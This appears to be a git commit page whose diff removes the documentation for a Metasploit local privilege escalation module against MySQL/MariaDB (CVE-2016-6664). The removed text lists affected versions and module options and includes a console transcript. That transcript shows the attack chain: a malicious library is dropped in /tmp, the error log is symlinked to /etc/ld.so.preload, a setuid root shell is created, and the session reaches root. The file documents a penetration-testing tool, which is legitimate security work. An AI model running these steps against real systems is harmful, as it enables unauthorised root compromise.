Revert "Land #7605, Mysql privilege escalation, CVE-2016-6664" - premature merge
This reverts commit92a1c1ece4, reversing changes made to9b16cdf602.
This commit is contained in:
Brent Cook
@@ -1,127 +0,0 @@
|
||||
|
||||
## Notes
|
||||
|
||||
This exploit was tested on ubuntu 14 and 16. As it relies on log file location and service restarting, success on other linux distributions depends greatly.
|
||||
|
||||
## Creating A Testing Environment
|
||||
|
||||
There are a few requirements for this module to work:
|
||||
|
||||
1. mysql must be started by running mysql_safe
|
||||
2. the error log must be active
|
||||
3. mysql logging through syslog must not enabled
|
||||
4. mysql automatic restart must be enabled
|
||||
|
||||
Using Ubuntu 16.04:
|
||||
|
||||
1. install mariadb - `apt-get -y install mariadb-server`
|
||||
2. disable syslog - `sed -i -e "s/syslog/#syslog/g" /etc/mysql/mariadb.conf.d/50-mysqld_safe.cnf`
|
||||
3. enable error log - `sed -i -e "s/skip_log_error/#skip_log_error/g" /etc/mysql/mariadb.conf.d/50-mysqld_safe.cnf`
|
||||
4. enable service - `systemctl enable mysql.service`
|
||||
5. start service - `systemctl start mysql.service`
|
||||
|
||||
This module has been tested against the following versions of mysql running on Ubuntu 16.04:
|
||||
|
||||
1. MariaDB 10.0.27
|
||||
|
||||
On Ubuntu 14.04:
|
||||
|
||||
1. MySQL 5.5.35
|
||||
2. MariaDB 5.5.52
|
||||
|
||||
On Debian 8.6
|
||||
|
||||
1. MySQL 5.5.53
|
||||
|
||||
This module was not tested against, but may work against:
|
||||
|
||||
* MySQL
|
||||
<= 5.5.51
|
||||
<= 5.6.32
|
||||
<= 5.7.14
|
||||
|
||||
* MariaDB
|
||||
<= 5.5.50
|
||||
|
||||
* Percona Server
|
||||
< 5.5.51-38.2
|
||||
< 5.6.32-78-1
|
||||
< 5.7.14-8
|
||||
|
||||
* Percona XtraDB Cluster
|
||||
< 5.6.32-25.17
|
||||
< 5.7.14-26.17
|
||||
< 5.5.41-37.0
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Start msfconsole
|
||||
2. Exploit a box via whatever method
|
||||
4. Do: `use exploit/linux/local/mysql_priv_esc`
|
||||
5. Do: `set session #`
|
||||
6. Do: `set verbose true`
|
||||
7. Do: `exploit`
|
||||
|
||||
## Options
|
||||
|
||||
**WritableDir**
|
||||
|
||||
A folder we can write files to. Defaults to /tmp
|
||||
|
||||
**ErrorLog**
|
||||
|
||||
The mysql service error log file. The location of this file is set on the configuration files. Defaults to /var/log/mysql/error.log
|
||||
|
||||
**BackdoorShell**
|
||||
|
||||
The shell that will be launched using elevated privileges. Defaults to /bin/bash
|
||||
|
||||
**COMPILE**
|
||||
|
||||
If we should live compile on the system, or drop pre-created binaries. `Auto` will determine if gcc/libs are installed to compile live on the system. Defaults to `Auto`
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Ubuntu 16.04 (with Linux 4.4.0-21-generic)
|
||||
### MariaDB 10.0.27 (MariaDB-0ubuntu0.16.04.1)
|
||||
|
||||
#### Initial Access
|
||||
|
||||
Use whatever means to get a session back to metaploit ith the mysql account, usually dropping a webshell, connecting back to metaploit and escalate to mysql.
|
||||
|
||||
#### Escalate to root
|
||||
|
||||
msf exploit(mysql_priv_esc) >
|
||||
[*] Sending stage (36 bytes) to 192.168.205.64
|
||||
[*] Command shell session 45 opened (192.168.205.52:443 -> 192.168.205.64:51400) at 2016-11-16 21:44:16 +0000
|
||||
|
||||
msf exploit(mysql_priv_esc) > set session 45
|
||||
session => 45
|
||||
msf exploit(mysql_priv_esc) > run
|
||||
|
||||
[+] mysqld_safe is running
|
||||
[+] The current user is mysql
|
||||
[*] Checking if gcc are installed
|
||||
[*] Checking if gcc are installed
|
||||
[*] Dropping pre-compiled exploit on system
|
||||
[*] Writing privesclib to /tmp/fYAMgzW5.so
|
||||
[*] Max line length is 65537
|
||||
[*] Writing 8240 bytes in 1 chunks of 19877 bytes (octal-encoded), using printf
|
||||
[*] Seting up the preload trap
|
||||
[*] cp /bin/bash /tmp/mysqlrootsh
|
||||
[*] touch -f /var/log/mysql/error.log; mv /var/log/mysql/error.log /var/log/mysql/error.log.tmp && ln -s /etc/ld.so.preload /var/log/mysql/error.log
|
||||
[*] kill $(pgrep mysqld)
|
||||
[*] /bin//sh: 27: kill: Operation not permitted
|
||||
|
||||
[*] Waiting for mysqld to restart...
|
||||
[*] Executing escalation.
|
||||
[*] echo /tmp/fYAMgzW5.so > /etc/ld.so.preload
|
||||
[*] chmod 755 /etc/ld.so.preload
|
||||
[*] /usr/bin/sudo 2>/dev/null >/dev/null
|
||||
[*] /tmp/mysqlrootsh -p -c "rm -f /etc/ld.so.preload; rm -f /tmp/fYAMgzW5.so"
|
||||
[*] /tmp/mysqlrootsh -p
|
||||
[*] Cleanup done.
|
||||
[!] This exploit may require manual cleanup of '/tmp/mysqlrootsh' on the target
|
||||
msf exploit(mysql_priv_esc) > sessions -i 45 -c "id"
|
||||
[*] Running 'id' on shell session 45 (192.168.205.64)
|
||||
uid=112(mysql) gid=121(mysql) euid=0(root) groups=121(mysql)
|
||||
Reference in New Issue
Block a user